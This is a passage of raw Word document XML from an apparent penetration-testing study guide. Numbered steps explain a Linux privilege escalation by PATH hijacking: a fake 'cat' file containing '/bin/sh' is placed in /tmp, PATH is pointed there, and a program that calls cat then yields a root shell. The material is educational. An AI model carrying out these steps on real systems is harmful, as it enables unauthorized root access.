            <w:r w:rsidRPr="001F2186">
              <w:t xml:space="preserve">Once inside the target machine, user level access probably allows you to </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">navigate to </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/bin </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and/or </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin </w:t>
            </w:r>
            <w:r>
              <w:t>to find where the cat binary is located. Alternatively, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-type f</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-name </w:t>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26400E58" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="001F2186" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t xml:space="preserve">This will search the system for any files named ‘cat’, you may have a few results but we’re looking for the file stored in either </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/bin </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:r w:rsidRPr="001F2186">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="1C08A5B1" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12EED886" w14:textId="6504B388" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FF55150" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="00AA366F" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pP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313D6997" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00393D16">
              <w:t xml:space="preserve">Once you have </w:t>
            </w:r>
            <w:r>
              <w:t>found the location of the file, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin/cat </w:t>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E423AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(You may not even need to copy it)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00393D16">
              <w:t>This creates a new copy of the binary, now we want to alter it to give us a root shell:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin/sh</w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>/tmp/</w:t>
            </w:r>
            <w:r w:rsidRPr="00272729">
              <w:t>cat</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E423AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Either overwriting or creating a new file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="0D229A8B" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12C936FE" w14:textId="3FE10196" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C4F70E2" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="00466824" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EAA7A4D" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="00AA366F" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t xml:space="preserve">Now, we can add a directory location for where </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t>can found/called from using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>export</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>PATH</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This will now use our malicious cat file when another file or script seeks to use cat (if they try calling it from a relative path, as opposed to the absolute path file). The real cat binary is no longer in the PATH variable so when cat is called, the real binary won’t be able to be found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="061F3333" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="038F6D50" w14:textId="7F5025AB" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30614CFC" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="005C74B8" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD33EDC" w14:textId="6D49E75F" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>Don’t forget that you need to give the malicious cat file execute permissions so that it can be executed when called upon.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2314F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp/cat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E423AB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Or cd over to the location of the cat file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="3B82BDB3" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="75FBE49F" w14:textId="71FC996E" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B7E9156" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="219A6789" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t xml:space="preserve">Now, run the program or script which calls the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and it will execute whatever is in the </w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">file (in this example, </w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin/sh</w:t>
            </w:r>
            <w:r>
              <w:t>, which gives the user a root shell!).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="30E8B3A1" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21B44815" w14:textId="74ABD5C5" w:rsidR="00BB63D6" w:rsidRDefault="007118F6" w:rsidP="00BB63D6">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BB63D6">
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1C3E0F1E" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D6C24D" w14:textId="368CA8C2" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:r>
              <w:t xml:space="preserve">Once root access has been gained, it is probably a good idea to change the PATH locations back to normal, or at least show PATH where the original cat binary is, otherwise the normal </w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t>command will not work anymore:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>export</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>PATH</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>=/usr/bin</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Or</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>export</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>PATH</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/lib/lightdm/lightdm</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/local/sbin</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/local/bin</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/sbin</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
              <w:t>/usr/bin</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>sbin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/games</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00981CA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/local/games</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00275DB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB63D6" w14:paraId="4DF670C4" w14:textId="77777777" w:rsidTr="00BB63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A3FEF0B" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31C264BF" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099FAE82" w14:textId="77777777" w:rsidR="00BB63D6" w:rsidRPr="001E0F42" w:rsidRDefault="00BB63D6" w:rsidP="00BB63D6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BC4DF46" w14:textId="77777777" w:rsidR="00C76C45" w:rsidRDefault="00C76C45"/>
    <w:p w14:paraId="325587DC" w14:textId="77777777" w:rsidR="00C76C45" w:rsidRDefault="00C76C45">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A467C00" w14:textId="3CAAA3B0" w:rsidR="00C76C45" w:rsidRDefault="00C76C45" w:rsidP="00C76C45">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mount</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624E45" w14:paraId="73561C37" w14:textId="77777777" w:rsidTr="006E5135">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D0FE16B" w14:textId="281943C3" w:rsidR="00624E45" w:rsidRDefault="00624E45" w:rsidP="0006198D">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00EB0837">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
